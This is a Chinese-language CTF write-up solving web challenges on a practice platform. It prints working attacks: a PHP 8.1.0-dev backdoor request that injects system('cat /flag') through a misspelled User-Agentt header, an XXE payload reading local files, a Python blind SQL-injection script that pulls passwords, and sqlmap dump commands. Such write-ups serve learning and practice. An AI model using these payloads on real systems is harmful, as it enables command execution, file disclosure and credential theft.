php后门
根据x-powered-by知道php的版本
该版本存在漏洞:
PHP 8.1.0-dev 开发版本后门
根据报错信息,进行提示,前
GET / HTTP/1.1
Host: challenge.qsnctf.com:31639
User-Agentt:12345678system('cat /flag');var_dump(2*3);zerodium12345678system('tac /flag');
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 2
成功执行tac /flag命令
理解原理来做就好
https://www.modb.pro/db/104464
这种文章只是演示类的,一般比赛都不会是原题直出的
https://blog.csdn.net/zy15667076526/article/details/116447864
EasyMD5
可以找到原题
参考文章:
https://blog.csdn.net/qq_74240553/article/details/135740695
使用工具fastcoll,生成两个相同md5的pdf文件
xxe漏洞
参考文章:
https://blog.csdn.net/qq_61553520/article/details/130655389
libxml版本是2.8.0,可能存在xml漏洞
这又是一道原题
https://blog.csdn.net/qq_74240553/article/details/135644491
POST /dom.php HTTP/1.1
Host: challenge.qsnctf.com:32592
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Origin: http://challenge.qsnctf.com:32592
Connection: close
Referer: http://challenge.qsnctf.com:32592/dom.php
Upgrade-Insecure-Requests: 1
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///flag" >]>
<root>
<name>&xxe;</name>
</root>
Easy_SQLi
确认存在注入
使用时间盲注,进行测试
import requests
import sys
import time
url = "http://challenge.qsnctf.com:31230/login.php"
flag = ""
for i in range(1,80):
max = 127
min = 32
while 1:
mid = (max+min)>>1
if(min == mid):
flag += chr(mid)
print(flag)
break
#payload = "admin'and (ascii(substr((select database()),{},1))<{})#".format(i,mid)
#qsnctf
#payload = "admin'and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{})#".format(i,mid)
#users
#payload = "admin'and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),{},1))<{})#".format(i,mid)
#USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password
payload = "admin'and (ascii(substr((select group_concat(password) from users),{},1))<{})#".format(i,mid)
data = {
"uname":payload,
"psw":0,
}
res = requests.post(url = url,data =data)
time.sleep(0.3)
if res.text.find("Invalid username or password")<0:
max = mid
else:
min = mid
成功测试出flag
方法二:使用sqlmap一把梭
sqlmap -r 123.txt --tables
这里不知道为什么这里不可以用–current-db进行测试当前的数据库
但是上面的方法还是可以知道当前的数据库是有个叫qsnct的
sqlmap -r 123.txt -D qsnctf --tables
有个users表
查一下字段有什么
sqlmap -r 123.txt -D qsnctf -T users --columns
既然又password肯定要去看一下
脱数据
sqlmap -r 123.txt -D qsnctf -T users -C password --dump
这个就是flag,由于时间问题就没有放完了